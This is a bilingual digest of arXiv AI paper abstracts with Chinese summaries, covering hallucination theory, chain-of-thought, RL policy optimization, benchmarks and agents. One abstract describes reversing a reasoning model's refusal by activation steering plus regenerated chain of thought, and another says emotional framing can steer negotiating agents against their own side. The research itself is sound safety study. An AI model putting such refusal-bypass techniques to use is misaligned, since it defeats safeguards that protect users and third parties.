RAGEAR further improves ranking quality over a transcript-based normalized SumP baseline, especially for top-ranked recommendations.

2605.26808 2026-05-27 cs.LG cs.AI cs.IT math.IT 版本更新

Innovation: An Almost Characterization of Hallucination

创新:幻觉的几乎刻画

Nishant P. Das, Piyush Srivastava

发表机构 * School of Technology and Computer Science, Tata Institute of Fundamental Research, Mumbai, Maharashtra - 400 005, India(技术与计算机科学学院,塔塔基础研究机构,孟买,马哈拉施特拉邦 - 400 005, 印度)

AI总结 本文引入“创新”属性来刻画大语言模型幻觉的必然性,证明创新与幻觉几乎等价,并基于创新率给出新的幻觉率下界。

详情
AI中文摘要

幻觉是大语言模型(LLMs)的一个核心局限,大量工作致力于理解和缓解它。为此,Kalai 和 Vempala(STOC 2024)引入了一个概率框架来形式化校准和幻觉,并证明高概率下,校准的 LLM 大致以“缺失质量”(衡量训练数据相对于其来源的不完整程度)的速率产生幻觉。这引出了两个基本问题:(i) 校准的 LLM 的什么属性使得幻觉不可避免?(ii) 能否通过放弃校准来避免幻觉?我们通过引入一个更简单的属性——我们称之为“创新”——来回答这些问题,该属性衡量模型产生训练数据之外输出的倾向。我们证明,创新由 Kalai 和 Vempala 识别的幻觉条件蕴含,并且进一步,它是幻觉的几乎刻画:幻觉蕴含创新,反之,创新高概率地蕴含幻觉。我们还基于“创新率”给出了幻觉率的下界,并通过将创新率与缺失质量联系起来,获得了基于缺失质量的新的幻觉率下界,扩展了 Kalai 和 Vempala 的结果。

英文摘要

Hallucination is a central limitation of large language models (LLMs), and substantial effort has been devoted to understanding and mitigating it. Towards this, Kalai and Vempala (STOC 2024) introduced a probabilistic framework formalizing calibration and hallucination, and showed that, with high probability, calibrated LLMs hallucinate roughly at the rate of the "missing mass", a measure of how incomplete the training data is relative to its source. This raises two fundamental questions: (i) what property of a calibrated LLM makes hallucinations unavoidable? and (ii) can hallucinations be avoided by giving up calibration? We answer these questions by introducing a simpler property we call innovation that measures the tendency of a model to produce outputs outside the training data. We show that innovation is implied by the condition for hallucination identified by Kalai and Vempala, and, further, that it is an almost characterization of hallucination: hallucination implies innovation, and conversely, innovation implies hallucination with high probability. We also provide lower bounds on the hallucination rate based on the "innovation rate", and by relating innovation rate back to missing mass, we obtain new hallucination rate lower bounds based on missing mass that extend the results of Kalai and Vempala.

2605.26807 2026-05-27 cs.SE cs.AI 版本更新

HTMLCure: Turning Browser Experience into State Guided Repair for Interactive HTML

HTMLCure:将浏览器体验转化为面向交互式HTML的状态引导修复

Jiajun Wu, Jian Yang, Tuney Zheng, Wei Zhang, Haowen Wang, Yihang Lou, Xianglong Liu

发表机构 * Beihang University(北京航空航天大学) IQuest Research(IQuest研究院) Peking University(北京大学)

AI总结 提出HTMLCure框架,通过浏览器交互执行、状态感知诊断和闭环修复引擎,从大规模HTML页面中筛选并修复可修复页面,显著提升SFT数据质量和模型性能。

Comments 27 pages, 11 figures. Code: https://github.com/wuyuVerse/HTMLCure

详情
AI中文摘要

LLM现在可以生成完整的HTML页面,但其中许多页面仅在表面上正确:它们渲染一次,然后在滚动、悬停、点击、调整大小或游戏过程中失败。基于截图的评估可能遗漏这些失败,而过滤会丢弃许多仍然可修复的页面。我们引入了HTMLCure,一个浏览器体验框架,在系统与页面交互后评估HTML。评估器跨视口和交互状态执行页面,记录确定性的浏览器证据,并向VLM提供来自执行轨迹的精选关键帧,而非孤立截图。相同的状态信号驱动闭环修复引擎:HTMLCure诊断当前页面,选择特定状态的修复家族,再次运行每个候选页面,并导出质量清理后的页面用于SFT。在97K提示语料库上,这将直接可用的种子扩展为63703个质量清理页面的候选池,从中我们构建了最终的40K页面精炼SFT集。在相同骨干和训练方案下,HTMLCure-27B-Refined在HTMLBench-400上达到50.6分,确定性测试用例通过率为45.2%,与Kimi-K2.6和GPT-5.4等强参考行处于相同性能区间。在发布的MiniAppBench验证集上,它达到81.2的平均分,比原始27B SFT提高15.3分,接近强参考系统的水平。

英文摘要

LLMs can now produce full HTML pages, but many of those pages are only superficially correct: they render once, then fail under scroll, hover, click, resize, or gameplay. Evaluation from screenshots can miss these failures, and filtering discards many pages that are still repairable. We introduce HTMLCure, a browser experience framework that evaluates HTML after the system has interacted with it. The evaluator executes the page across viewports and interaction states, records deterministic browser evidence, and gives the VLM curated keyframes from the executed trajectory rather than isolated screenshots. The same state signal drives a closed loop repair engine: HTMLCure diagnoses the current page, chooses a state specific repair family, runs each candidate again, and exports quality cleared pages for SFT. On a 97K prompt corpus, this expands the directly usable seed into a candidate pool of 63703 quality cleared pages, from which we construct the final refined SFT set of 40K pages. Under the same backbone and training recipe, HTMLCure-27B-Refined reaches 50.6 on HTMLBench-400 with 45.2% deterministic test case pass, placing it in the same performance band as strong reference rows such as Kimi-K2.6 and GPT-5.4. On the released MiniAppBench validation split, it reaches 81.2 average, improving raw 27B SFT by 15.3 points and approaching the level of strong reference systems.

2605.26795 2026-05-27 cs.AI 版本更新

What Makes Chain-of-Thought Work at Probe Time? Local Co-occurrence Rather Than Global Derivation

链式思维在探测时为何有效?局部共现而非全局推导

Xiang Wang, Wei Wei

发表机构 * Huazhong University of Science and Technology(华中科技大学)

AI总结 研究链式思维提示在探测时提升语言模型准确率的原因,发现增益主要来自词汇激活和短距离标记共现,而非句子级逻辑推导。

详情
AI中文摘要

链式思维提示可靠地提高了语言模型的准确性,但推理文本的哪些属性驱动了这种改进尚不清楚。先前的工作主要研究生成本身的行为。我们转而提出一个探测时问题:给定上下文中的固定推理文本,该文本中的什么改变了答案?我们确定了增益的两个互补来源。首先,即使是全局词序打乱的推理文本也显著优于无推理基线,表明存在强烈的词汇激活效应。更重要的是,结构化文本带来的额外增益似乎较少来自句子级的逻辑排序,而更多来自短距离标记邻接。保留仅$n^\star{=}2$--$3$个标记的连续窗口即可恢复向完整链式思维性能的大部分剩余增益。支持性实验排除了显式答案声明或答案值的复制以及完整的语法实现作为主要驱动因素。进一步的泛化实验表明,这种定性模式在多个模型家族、参数规模和数据集上保持稳定。这些结果支持探测时链式思维的局部共现激活解释,其中观察到的增益主要来自词汇激活和短距离标记共现,而非句子级逻辑推导。

英文摘要

Chain-of-thought (CoT) prompting reliably improves language-model accuracy, but which properties of a rationale text drive the improvement is poorly understood. Prior work has largely studied generation-time behavior. We instead ask a probe-time question: given a fixed rationale in context, what in that text changes the answer? We identify two complementary sources of the gain. First, even a globally word-shuffled rationale substantially outperforms the no-rationale baseline, indicating a strong lexical activation effect. More importantly, the additional gain from structured text appears to arise less from sentence-level logical ordering and more from short-range token adjacency. Preserving contiguous windows of just $n^\star{=}2$--$3$ tokens recovers most of the remaining gain toward full CoT performance. Supporting experiments rule out copying of explicit answer declarations or answer values, as well as full grammatical realization, as primary drivers. Further generalization experiments show that the qualitative pattern remains stable across multiple model families, parameter scales, and datasets. These results support a local co-occurrence activation (LCA) account of probe-time CoT, in which the observed gains appear to arise primarily from lexical activation and short-range token co-occurrence rather than sentence-level logical derivation.

2605.26789 2026-05-27 cs.AI 版本更新

Composition Collapse: Stable Factual Knowledge Does Not Imply Compositional Reasoning

组合崩溃:稳定的事实知识并不意味着组合推理

Zhe Yu, Wenpeng Xing, Yunzhao Wei, Jie Chen, Hongzhi Wang, Xuyang Teng, Meng Han

发表机构 * Zhejiang University(浙江大学) Binjiang Institute of Zhejiang University(浙江大学滨江研究院) Hong Kong Baptist University(香港 Baptist大学) Harbin Institute of Technology(哈尔滨工业大学) Hangzhou Dianzi University(杭州电子科技大学)

AI总结 本文提出组合崩溃现象,即模型在稳定掌握原子事实的情况下仍无法将其组合成链式推理,并通过双门控协议分解后训练增益,揭示聚合指标掩盖的组合能力变化。

详情
AI中文摘要

后训练通常通过聚合基准分数来评估,这些分数将多跳推理视为单一能力——仿佛回答更多问题的模型必然更擅长组合事实。我们表明这种假设可能具有误导性:在统计上无法区分的原子知识配方下,组合行为差异超过40个百分点,我们将这种现象称为组合崩溃:即系统性地无法将稳定已知的事实组合成链,而这种失败对聚合指标不可见。我们引入双门控协议,将估计量从聚合组合性差距转变为基于稳定原子访问的残差组合失败,将后训练收益分解为三个独立通道:原子稳定性、残差组合和关键深度。在一个涵盖深度2-11的时序事实链基准上,对四种后训练配方进行分解,揭示了后训练目标以聚合指标掩盖的方式改变组合能力,并表明关于多跳推理改进的主张应伴随原子门控控制的组合指标。诊断探针进一步显示,测量到的组合失败中相当一部分反映了生成时的计算约束,而非永久性的组合能力缺失。

英文摘要

Post-training is routinely evaluated through aggregate benchmark scores that treat multi-hop reasoning as a single capability -- as if a model that answers more questions correctly must be better at assembling facts. We show that this assumption can be misleading: recipes with statistically indistinguishable atomic knowledge produce composition behaviour separated by over 40 percentage points, a phenomenon we call composition collapse: the systematic failure to assemble stably-known facts into chains, invisible to aggregate metrics. We introduce a double-gate protocol that changes the estimand from an aggregate compositionality gap to residual composition failure conditioned on stable atomic access, decomposing post-training gains into three independent channels: atomic stability, residual composition, and critical depth. On a benchmark of temporal factual chains spanning depths 2--11 across four post-training recipes, this decomposition reveals that post-training objectives shift composition capability in directions that aggregate metrics mask, and suggests that claims about multi-hop reasoning improvement should be accompanied by atomic-gate-controlled composition metrics. Diagnostic probes further show that a substantial share of measured composition failure reflects generation-time computation constraints rather than permanent inability to compose.

2605.26788 2026-05-27 cs.CL cs.AI 版本更新

SeDT: Sentence-Transformer Decision-Transformer Conditioning for Multi-Turn Conversation Reliability

SeDT: 基于句子变换器的决策变换器条件化用于多轮对话可靠性

Ramakrishna Vamsi Setti, Jagadeesh Rachapudi, Sachin Chaudhary, Praful Hambarde, Amit Shukla

发表机构 * Independent Researcher(独立研究者) Drone Lab, IIT Mandi(IIT曼迪无人机实验室) UPES, Dehradun(德里敦UPES)

AI总结 针对大语言模型在多轮对话中性能下降的问题,提出一种无需训练和额外数据的推理方法SeDT,通过引入离线强化学习中的return-to-go条件化,利用语义、词汇和位置信号计算累积相关性得分并注释对话历史,显著提升模型性能并降低不可靠性。

详情
AI中文摘要

大语言模型(LLMs)在单轮任务完全指定时表现令人印象深刻,但当相同任务在多轮中逐步揭示时,同一模型性能下降高达39%,这一现象在规模上被记录为“迷失在对话中”。关键的是,这种崩溃几乎完全是可靠性失败;最佳情况下,能力仅下降16%,而不可靠性增加超过一倍(+112%)。我们认为根本原因是结构性的:扁平化的对话历史对每个先前轮次赋予相等隐式权重,使模型无法区分关键约束与无关对话。我们提出SeDT(句子变换器-决策变换器),一种无需训练的推理时方法,通过从离线强化学习中引入return-to-go条件化来解决此问题。SeDT使用来自三种互补信号(语义、词汇和位置)的累积相关性得分注释每个对话片段,并在最后一轮向模型呈现完整的注释历史,无需权重更改、无需训练数据、无需丢弃上下文。在三个LLM和三个生成任务的Lost-in-Conversation基准上评估,SeDT在所有九个模型-任务组合中均优于分片基线,平均性能P提升高达+37.7%,同时在九个组合中的七个中降低了不可靠性。简而言之,告诉模型哪些过去的轮次重要足以显著恢复对话中丢失的性能。

英文摘要

Large language models (LLMs) achieve impressive performance when a task is fully specified in a single turn, yet the same models lose up to 39% of that performance when the identical task is revealed incrementally across multiple turns, a phenomenon documented at scale as Lost in Conversation. Crucially, this collapse is almost entirely a reliability failure; the best case, the aptitude only falls 16%, while the unreliability more than doubles (+112%). We argue that the root cause is structural, a flat conversation history assigns equal implicit weight to every prior turn, giving the model no signal to distinguish a critical constraint from incidental dialog. We present SeDT Sentence-transformer Decision-Transformer, a training-free inference-time method that resolves this by importing return-to-go conditioning from offline reinforcement learning. SeDT annotates each conversation shard with a cumulative relevance score derived from three complementary semantic, lexical, and positional signals and presents the full annotated history to the model at the final turn, without weight changes, without training data, and without discarding context. Evaluated on the Lost-in-Conversation benchmark in three LLMs and three generation tasks, SeDT outperforms the sharded baseline in all nine model-task combinations, with gains up to +37.7% in mean performance P and simultaneous reductions in unreliability in seven of the nine combinations. In short, telling the model which past turns matter is sufficient to substantially recover the performance lost in conversation.

2605.26786 2026-05-27 cs.CY cs.AI cs.LG 版本更新

Implementation of Big Data Analytics for Diabetes Management: Needs Assessment in the Rwanda Healthcare System

大数据分析在糖尿病管理中的应用:卢旺达医疗系统需求评估

Silas Majyambere, Tony Lindgren, Workneh Y. Ayele, Celestin Twizere

发表机构 * University of Rwanda(卢旺达大学)

AI总结 本研究通过利益相关者研讨会评估卢旺达医疗系统采用大数据分析管理糖尿病的准备情况,并提出了一个基于可解释机器学习模型的实用框架。

详情
AI中文摘要

糖尿病是一种慢性代谢疾病,如果不及早诊断和管理,可能导致严重的健康问题。大数据分析和机器学习为分析大型健康数据集、支持早期发现和更好的治疗决策提供了实用工具。然而,它们在常规临床实践中的使用仍然有限。本研究考察了卢旺达医疗系统采用大数据分析管理糖尿病的准备情况。随着该国不断扩大电子病历和健康信息系统的使用,改善预测、监测和临床决策的新机遇随之出现。我们举办了一个为期五天的研讨会,涉及25名关键利益相关者,包括临床医生、数据管理员、政策制定者、医学研究人员、营养学家和技术提供商,以评估准备情况并识别现有差距。研究结果突出了大数据分析实施的潜力和主要挑战。基于这些结果,本文提出了一个实用的大数据分析框架,利用可解释的机器学习模型支持糖尿病管理策略。

英文摘要

Diabetes is a chronic metabolic disease that can lead to serious health problems if not diagnosed and managed early. Big Data Analytics (BDA) and machine learning offer practical tools for analyzing large health datasets and supporting early detection and better treatment decisions. However, their use in routine clinical practice is still limited. This study examines the readiness of Rwanda's healthcare system to adopt big data analytics for diabetes management. As the country continues to expand its use of electronic medical records and health information systems, new opportunities arise for improving prediction, monitoring, and clinical decision-making. A five-day workshop involving 25 key stakeholders, including clinicians, data managers, policymakers, medical researchers, nutritionists, and technology providers, was conducted to assess preparedness and identify existing gaps. The findings highlight both the potential and the main challenges of BDA implementation. Based on these results, the paper proposes a practical BDA framework to support diabetes management strategies using explainable machine learning models.

2605.26785 2026-05-27 cs.CL cs.AI 版本更新

EmoDistill: Offline Emotion Skill Distillation for Language Model Agents in Adversarial Negotiation

EmoDistill: 对抗性谈判中语言模型代理的离线情感技能蒸馏

Yunbo Long, Haolang Zhao, Lukas Beckenbauer, Liming Xu, Alexandra Brintrup

发表机构 * University of Cambridge(剑桥大学) Technical University of Munich(慕尼黑技术大学) Exiger LLC The Alan Turing Institute(艾伦·图灵研究所)

AI总结 提出EmoDistill离线框架,通过隐式Q学习选择情感和低秩适应策略表达情感,蒸馏情感谈判技能到语言模型代理,在四个高风险谈判领域取得最高效用。

详情
AI中文摘要

后训练的LLM通常被优化以对齐响应与人类偏好,使其安全、礼貌且适合对话。然而,在对抗性谈判中,这种对齐可能成为漏洞:情感框架语言可能引导代理朝向对手方利益。使用基于GoEmotions的情感提示,我们表明情感显著改变谈判结果,表明情感是战略行动渠道而非表面风格。因此,我们引入 extbf{EmoDistill},一个用于将情感谈判技能蒸馏到语言模型代理中的离线框架。EmoDistill将情感策略分解为情感选择和情感表达:隐式Q学习(IQL)选择器学习表达\emph{哪种}情感,而基于低秩适应(LoRA)的策略通过监督微调(SFT)和裁判策略优化(JPO)学习\emph{如何}表达它。在四个情感敏感、高风险的谈判领域,在EmoDistill框架下训练的SLM策略实现了最高效用,优于普通SLM/LLM基线和仅IQL情感选择。消融实验表明情感条件化是必要的,迁移研究展示了跨领域、未见对手和训练对训练锦标赛的泛化能力。总体而言,EmoDistill从离线代理间交互中学习技能,避免了训练期间昂贵的在线谈判。

英文摘要

Post-trained LLMs are often optimized to align responses with human preferences, making them safe, polite, and conversationally appropriate. In adversarial negotiation, however, this alignment can become a vulnerability: emotionally framed language may steer agents toward the counterparty's interests. Using GoEmotions-based affective prompting, we show that emotion substantially shifts negotiation outcomes, suggesting that emotion is a strategic action channel rather than a surface style. Thus, we introduce \textbf{EmoDistill}, an offline framework for distilling emotional negotiation skills into language model agents. EmoDistill decomposes emotional strategy into emotion selection and emotion expression: an Implicit Q-Learning (IQL) selector learns \emph{which} emotion to express, while a Low-Rank Adaptation (LoRA)-based policy learns \emph{how} to express it through Supervised Fine-Tuning (SFT) and Judge Policy Optimization (JPO). Across four emotion-sensitive, high-stakes negotiation domains, SLM policies trained under the EmoDistill framework achieve the highest utility, outperforming vanilla SLM/LLM baselines and IQL-only emotion selection. Ablations show that emotion conditioning is essential, and transfer studies demonstrate generalization across domains, unseen counterparties, and trained-vs-trained tournaments. Overall, EmoDistill learns skills from offline agent-to-agent interactions, avoiding costly online negotiation during training.

2605.26784 2026-05-27 cs.LG cs.AI 版本更新

Ratio-Variance Regularized Policy Optimization

比率方差正则化策略优化

Yu Luo, Shuo Han, Yihan Hu, Lei Lv, Huaping Liu, Fuchun Sun, Jianye Hao, Dong Li

发表机构 * Department of Foundation Model, 2012 Labs, Huawei(华为基础模型部门,2012实验室) Shanghai Research Institute for Intelligent Autonomous Systems, Tongji University(上海智能自主系统研究院,同济大学) Department of Computer Science and Technology, Tsinghua University(清华大学计算机科学与技术系) College of Intelligence and Computing, Tianjin University(天津大学智能与计算学院)

AI总结 提出R²VPO方法,通过约束策略比率方差作为信任区域的局部近似,替代启发式裁剪,在LLM和机器人控制任务中提升性能与样本效率。

详情
AI中文摘要

标准的同策略强化学习依赖启发式裁剪来强制信任区域,但这种机制通过不加区分地截断高回报但高散度的更新而施加了严重代价。我们证明,显式约束策略比率方差为信任区域约束提供了原则性的局部近似,消除了二元硬裁剪的需要。通过作为分布式的“软刹车”,这种方法保留了来自新颖发现的关键梯度信号,同时自然降低权重并允许重用陈旧的离策略数据。我们引入了${\bf R}^2{\bf VPO}$(比率方差正则化策略优化),它通过原始-对偶优化框架实现这一约束。在跨越快速和慢速推理范式的$7$个LLM规模以及$10$个机器人控制任务上的广泛评估证明了所提出方法的通用性。R$^2$VPO在数学推理基准上取得了显著的性能提升,特别是在较小模型上改进尤为明显,同时显著提高了样本效率。此外,它在连续控制领域(特别是稀疏奖励和动态环境)中始终优于PPO基线。这些发现共同确立了比率方差正则化作为稳定且数据高效策略优化的原则性基础。

英文摘要

Standard on-policy reinforcement learning relies on heuristic clipping to enforce trust regions, but this mechanism imposes a severe cost by indiscriminately truncating high-return yet high-divergence updates. We demonstrate that explicitly constraining the policy ratio variance provides a principled local approximation to trust-region constraints, eliminating the need for binary hard clipping. By acting as a distributional ``soft brake'', this approach preserves critical gradient signals from novel discoveries while naturally down-weighting and enabling the reuse of stale, off-policy data. We introduce ${\bf R}^2{\bf VPO}$ (Ratio-Variance Regularized Policy Optimization), which implements this constraint via a primal-dual optimization framework. Extensive evaluations across $7$ LLM scales, spanning both fast and slow reasoning paradigms, and $10$ robotic control tasks demonstrate the generality of the proposed approach. R$^2$VPO achieves substantial performance gains on mathematical reasoning benchmarks, with particularly pronounced improvements on smaller models, while significantly improving sample efficiency. Furthermore, it consistently outperforms PPO baselines in continuous control domains, particularly in sparse-reward and dynamic environments. Together, these findings establish ratio-variance regularization as a principled foundation for stable and data-efficient policy optimization.

2605.26781 2026-05-27 cs.AI cs.MM 版本更新

LiveK12Bench: Have Large Multimodal Models Truly Conquered High School-level Examinations?

LiveK12Bench: 大型多模态模型真的征服了高中水平的考试吗?

Xiaohan Wang, Mingze Yin, Yilin Zhao, Gang Liu, Dian Li

发表机构 * Tencent PCG(腾讯PCG) College of Computer Science and Technology, Zhejiang University(浙江大学计算机科学与技术学院)

AI总结 本文提出动态多学科基准LiveK12Bench,通过自动化流水线和新颖的模拟考试评估方案,揭示大型多模态模型在真实考试场景下性能显著下降,尤其对复杂视觉布局敏感。

详情
AI中文摘要

先进的大型多模态模型(LMMs)在K-12推理任务中展示了令人印象深刻的表现,展现出作为智能导师的巨大潜力。实现这一潜力需要模型有效应对真实世界的考试,但大多数现有基准未能捕捉真实考试环境的复杂性。具体来说,大多数数据集是静态的,容易受到数据污染,并且通常局限于受限的模态、学科和评估标准。为了解决这些问题,我们引入了LiveK12Bench,这是一个动态、全面、多学科的基准,旨在评估LMMs在真实考试场景中的推理能力。LiveK12Bench包含2000多道经过验证的题目,涵盖数学、物理、化学和生物,来源于最新的真实考试试卷,并设计为随时间增长。我们的框架具有几个核心创新:1)采用自动化流水线,持续摄取和解析最新考试试卷以减轻数据泄露;2)提出一种新颖的“模拟考试”评估方案,评估模型自主完成端到端考试并具有准确高效推理路径的能力。在12个LMMs上的大量实验表明,先进模型在考试真实约束下性能大幅下降:当过程严谨性和效率共同评估时,GPT-5的分数从79降至53(满分100)。我们的发现暴露了关键漏洞,例如对复杂视觉布局的敏感性,凸显了理想化推理能力与真正教育准备之间的差距。代码和数据集均已公开。

英文摘要

Advanced Large Multimodal Models (LMMs) have demonstrated impressive performance in K-12 reasoning tasks, exhibiting great promise as intelligent tutors. Realizing this potential requires models to navigate real-world examinations effectively, yet most existing benchmarks fail to capture the complexity of authentic testing environments. Specifically, most datasets are static, prone to data contamination, and are often confined to restricted modalities, disciplines, and evaluation criteria. To address these issues, we introduce LiveK12Bench, a dynamic, holistic, multi-disciplinary benchmark designed to evaluate the reasoning abilities of LMMs in realistic examination scenarios. LiveK12Bench comprises 2K+ verified questions spanning Mathematics, Physics, Chemistry, and Biology, sourced from the latest real-world exam papers and designed to grow over time. Our framework features several core innovations: 1) featuring an automated pipeline that continuously ingests and parses the latest examination papers to mitigate data leakage; and 2) proposing a novel `Mock Exam' evaluation scheme, which assesses the ability to complete end-to-end exams autonomously with accurate and efficient reasoning paths. Extensive experiments on 12 LMMs reveal that advanced models suffer substantial performance degradation under exam-realistic constraints: GPT-5's score drops from 79 to 53 (out of 100) when process rigor and efficiency are jointly evaluated. Our findings expose critical vulnerabilities, such as sensitivity to complex visual layouts, highlighting the gap between idealized reasoning capabilities and true educational readiness. Both code and dataset are publicly available.

2605.26778 2026-05-27 cs.AI 版本更新

The Attribution Blind Spot: Detecting When Language Models Rely on Memory Rather Than Retrieved Context

归因盲点:检测语言模型何时依赖记忆而非检索到的上下文

Zhe Yu, Wenpeng Xing, Yunzhao Wei, Bo Yang, Chen Ye, Gaolei Li, Meng Han

发表机构 * Zhejiang University(浙江大学) Binjiang Institute of Zhejiang University(浙江大学滨江研究院) National Fintech Evaluation Center(国家金融科技评估中心) Hangzhou Dianzi University(杭州电子科技大学) Shanghai Jiao Tong University(上海交通大学)

AI总结 本文提出计算现实监控(CRM)方法,通过比较有无上下文时的内部表征差异,检测语言模型是否依赖预训练记忆而非检索到的上下文进行生成,解决了输出级监控无法识别的归因盲点问题。

详情
AI中文摘要

检索增强生成承诺将语言模型输出锚定于外部证据,然而该领域缺乏可靠方法来验证检索到的上下文是否实际主导了生成——这是任何高风险部署的前提。标准假设(上下文一致的输出意味着上下文主导的输出)在检索到的文档与模型预训练数据重叠时失效:模型可以完全从参数化记忆中生成看似忠实的文本,且两种途径产生无法区分的输出。我们将此失败命名为归因盲点,并引入计算现实监控(CRM)来解决它。CRM 操作化了源自认知科学现实监控框架的一个原则:比较有上下文和无上下文时的内部表征,揭示了输出级监控系统系统性遗漏的基于成员条件的表征分歧。CRM 并不证明单个生成使用了哪个来源;它检测预训练暴露是否留下可测量的内部轨迹特征,从而为来源归因建立必要的基础。在跨越三个系列的九个模型变体中,这种分歧集中在架构特定的层模式中,得到块级噪声干预的汇聚支持,并在任务和数据集上泛化,而在领域混淆的基准上消失。归因盲点是可以测量且部分可解决的:内部表征携带输出级不可见的诊断信号,为系统建立基础,使其对证据来源的内部意识支配其外部行为。

英文摘要

Retrieval-augmented generation promises to ground language model outputs in external evidence, yet the field has no reliable way to verify whether retrieved context actually governs generation -- a prerequisite for any high-stakes deployment. The standard assumption, that context-consistent output implies context-governed output, breaks when the retrieved document overlaps with the model's pretraining data: the model can produce faithful-looking text entirely from parametric memory, and both pathways yield indistinguishable output. We name this failure the attribution blind spot and introduce Computational Reality Monitoring (CRM) to address it. CRM operationalizes a principle adapted from cognitive science's reality monitoring framework: comparing internal representations with and without context reveals membership-conditioned representational divergence that output-level monitors systematically miss. CRM does not certify which source an individual generation used; it detects whether pretraining exposure leaves a measurable internal trajectory signature, establishing a necessary substrate for source attribution. Across nine model variants spanning three families, this divergence concentrates in architecture-specific layer patterns, receives converging support from block-level noise intervention, and generalizes across tasks and datasets while collapsing on domain-confounded benchmarks. The attribution blind spot is measurable and partially addressable: internal representations carry a diagnostic signal invisible at the output level, establishing a foundation for systems whose internal awareness of evidence provenance governs their external behavior.

2605.26776 2026-05-27 cs.LG cs.AI 版本更新

Towards Generalization-Oriented Models for Vehicle Routing Problems with Mixture-of-Experts

面向泛化的混合专家车辆路径问题模型

Changhao Miao, Yuntian Zhang, Tongyu Wu, Fang Deng, Chen Chen

发表机构 * State Key Laboratory of Autonomous Intelligent Unmanned Systems, Beijing Institute of Technology(自主智能无人系统国家重点实验室,北京理工大学) School of AI, Beijing Institute of Technology(北京理工大学人工智能学院)

AI总结 提出基于混合专家架构的残差细化专家与实例级门控机制(R2E-IG),通过模块化策略网络和动态权重适应训练,提升车辆路径问题在分布偏移下的泛化能力。

详情
AI中文摘要

近年来,深度强化学习(DRL)在车辆路径问题(VRPs)上取得了显著进展。然而,现有的基于DRL的方法通常是在均匀分布生成的实例上训练的,这限制了它们在真实世界分布偏移下的性能。在本文中,我们旨在开发一个面向泛化的模型,该模型将策略网络划分为多个模块,并在推理过程中自适应地重组模块以形成特定策略。具体来说,我们提出了具有实例级门控的残差细化专家(R2E-IG)以改进跨分布泛化。我们的贡献有三方面:(1)我们引入了一种残差细化专家(R2E)架构,通过残差细化增强专家表达能力;(2)我们设计了一种实例级门控机制,学习分布感知的实例表示并将输入路由到合适的模块;(3)我们提出了一种配备动态权重适应(DWA)的混合分布训练机制,该机制动态地重新加权来自不同分布的训练数据,以强调更具信息量的数据。大量实验表明,R2E-IG在合成和基准数据集的分布内和分布外实例上均取得了与最先进基线相竞争的性能。此外,R2E-IG是通用的,可以轻松集成到现有的基于DRL的方法中,以进一步提高性能。

英文摘要

In recent years, Deep Reinforcement Learning (DRL) has achieved substantial progress on Vehicle Routing Problems (VRPs). However, existing DRL-based methods are typically trained on instances generated from a uniform distribution, which limits their performance under real-world distribution shifts. In this paper, we aim to develop a generalization-oriented model that partitions the policy network into multiple modules and adaptively recombines modules to form specific policies during inference. Specifically, we propose Residual Refined Experts with Instance-level Gating (R2E-IG) to improve cross-distribution generalization. Our contributions are threefold: (1) We introduce a Residual Refined Expert (R2E) architecture that enhance expert expressiveness via residual refinement; (2) We design an instance-level gating mechanism that learns distribution-aware instance representations and routes inputs to suitable modules; (3) We propose a mixed-distribution training mechanism equipped with Dynamic Weight Adaption (DWA), which dynamically reweights training data from different distributions to emphasize more informative ones. Extensive experiments show that R2E-IG achieves competitive performance against state-of-the-art baselines on both in-distribution and out-of-distribution instances across synthetic and benchmark datasets. Moreover, R2E-IG is generic and can be easily integrated into existing DRL-based methods to further improve performance.

2605.26772 2026-05-27 cs.AI 版本更新

Beyond a Single Direction: Chain-of-Thought Disrupts Simple Steering of Refusal

超越单一方向:思维链破坏简单的拒绝引导

Kia-Jüng Yang, Dominik Meier, Jiachen Zhao, Terry Ruas, Bela Gipp

发表机构 * University of Göttingen, Germany(哥廷根大学,德国) Northeastern University, Boston, MA, USA(东北大学,波士顿,马萨诸塞州,美国)

AI总结 本文研究大型推理模型(LRM)中拒绝行为的机制,发现思维链(CoT)与激活共同编码拒绝信号,使得仅通过激活引导难以逆转拒绝,但通过两阶段干预(激活引导下重新生成CoT)可显著提高逆转率。

详情
AI中文摘要

大型推理模型(LRM)在生成最终输出之前会生成思维链(CoT)轨迹,引入动态内部状态,可能使拒绝等控制机制复杂化。与指令调优的LLM不同,后者的拒绝由单一方向子空间介导,而LRM中的拒绝还依赖于CoT。在DeepSeek-R1-Distill-LLaMA-8B中,当CoT保持不变时,激活引导仅在39%的情况下逆转拒绝,但完全移除CoT可将此比例提高到70%,表明CoT积极强化拒绝。在两阶段干预中,模型在激活引导下重新生成其CoT,拒绝在94%的情况下被逆转,而即使移除引导,生成的CoT本身仍保留48%的效果。这表明CoT可以独立携带和重建顺从信号。这些发现表明,LRM中的拒绝由残差流激活和CoT共同编码。这种联合编码使得LRM对仅激活层面的干预更具鲁棒性,但使CoT暴露于可能的替代表面攻击。

英文摘要

Large reasoning models (LRMs) generate chain-of-thought (CoT) traces before producing final outputs, introducing a dynamic internal state that may complicate control mechanisms such as refusal. Unlike instruction-tuned LLMs, where refusal is mediated by a single directional subspace, refusal in large reasoning models (LRMs) additionally depends on the CoT. In DeepSeek-R1-Distill-LLaMA-8B, activation steering reverses refusal in only 39% of cases when the CoT is kept fixed, but removing the CoT entirely increases this to 70%, indicating that the CoT actively reinforces refusal. In a two-stage intervention where the model regenerates its CoT under activation steering, refusal is reversed in 94% of cases, while the resulting CoT alone retains 48% of this effect even after steering is removed. This suggests that the CoT can carry and reconstruct the compliance signal independently. These findings indicate that refusal in LRMs is jointly encoded in residual stream activations and CoT. This joint activation makes LRM more robust against activation-level interventions alone, but exposes CoT to a possible alternative surface attack.

2605.26769 2026-05-27 cs.CY cs.AI 版本更新

Generative artificial intelligence and the marginalization of minoritized knowledges in higher education: the case of disability

生成式人工智能与高等教育中少数群体知识的边缘化:以残疾为例

Fatiha Tali-Otmani

发表机构 * Université Toulouse Jean Jaurès-UMR EFTS(图卢兹让·雅克·儒勒大学-UMR EFTS)

AI总结 研究通过教育科学、批判技术研究和残疾研究,揭示生成式人工智能如何通过以英语和西方为中心的训练数据集强化认知殖民性,导致残疾人群体的双重边缘化,并探讨研究者与机器混合以维护认知多样性的可能性及其结构性限制。

详情
AI中文摘要

